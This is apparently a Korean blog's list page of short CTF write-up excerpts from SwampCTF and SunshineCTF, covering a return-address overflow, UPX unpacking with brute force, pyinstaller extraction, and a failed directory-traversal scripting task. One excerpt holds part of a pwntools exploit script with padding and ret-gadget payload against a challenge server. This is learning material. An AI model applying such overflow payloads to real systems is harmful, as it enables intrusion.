2018/04/08(9)
-
4~5월달 목표
5월달 목표 : 한 CTF에서 포너블 2문제 풀기 목표를 이루지 못하면, 공부를 더 해야하는 것. 반성하라.
2018.04.08 -
swamp return writeup
소요 시간 : 5시간 문제 의도1 read함수를 통해 50바이트를 읽어온다.2 retaddr이 &locret_8048595보다 크면 종료 3. 숨겨진 주소 : 0x08048AEA ropgadget 중 ret를 이용해야 함. payload : 버퍼를 0x26 채운 뒤 + ret 가젯 주소 + 내가 가고싶은 주소(플래그 있는 주소) 코드from pwn import * context.log_level ='debug' p = remote('chal1.swampctf.com',1802)#p = process("./return")print p.recvuntil("do: ")payload =""dummy = "A"*(0x26 + 4)_ret = p32(0x8048372)shell = p32(0x8048615)payl..
2018.04.08 -
swamp journey writeup
문제 의도 UPX Unpacking 문제 풀이 1. 17자리문자열을 입력2. moduls = 14231234143212433LL (signed __int64)가 주어짐 3. 17번 반복한다.-> 조건 1. v3값은 moduls%10값이 되기 때문에 결과적으로 v3는 계속 변한다.-> 변하는 값에 flag[i]를 뺀다-> 그 결과 theresanotherstep이 되면 된다. 코드#include #include #include unsigned char make_brute[] = { "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrsuvwxyzt" };unsigned char over[] = { "theresanotherstep" };int main(){unsigned cha..
2018.04.08 -
sunshine password writeup
문제 의도 : pyinstaller extractor에 대해 알고 있는가? 문제 풀이 : 해당 바이너리를 pyinstaller extractor로 돌리면 됨.지인인 서우에게 듣고 풀었음. 안들었으면 절대 못풀었을 듯 여담 : 함수 하나하나 다 보고 앉아있었음 passwords에 들어가면 플래그 획득
2018.04.08 -
sunshine hackername writeup
문제 유형 : buf overwrite handle_connection disassembly pwndbg> disass handle_connectionDump of assembler code for function handle_connection: 0x080486b7 :push ebp 0x080486b8 :mov ebp,esp 0x080486ba :sub esp,0x28 0x080486bd :mov DWORD PTR [ebp-0x12],0x0 0x080486c4 :mov DWORD PTR [ebp-0xe],0x0 0x080486cb :mov WORD PTR [ebp-0xa],0x0 0x080486d1 :sub esp,0xc 0x080486d4 :push 0x804880b 0x080486d9 :call 0..
2018.04.08 -
sunshine wrongbytes 시행착오
결국 풀진 못했다. 소요 시간 : 문법 구글링 + 에러 해결 구글링 + 코드 작성 + 알고리즘 작성 : 7시간 40분(대회 끝나버림) 문제 요구사항 : / 안에 무작위로 파일과 디렉터리가 생성. 디렉터리가 생성되어 있다면 디렉터리를 탐색 허나 그 디렉터리에 또 다른 디렉터리가 있다면 또 다시 탐색 ... 모든 디렉터리를 탐색 후 /로 돌아와서 send . 라는 명령어를 입력하면 플래그 획득. 느낀 점 : 동적프로그래밍에서 소켓을 이용하는 방법은 조금 익숙해진듯 함. 허나, 파이썬 문법에 대한 이해도가 현저히 부족함.파이썬 코드 디버깅하는 방법도 조금 알아야 할 필요성이 있음 무엇보다 코드가 상당히 더러움. 다음 CTF에서는 동적프로그래밍 2시간 이내에 푸는 것을 목표로. 이 문제를 통해 만들어진 나만의 ..
2018.04.08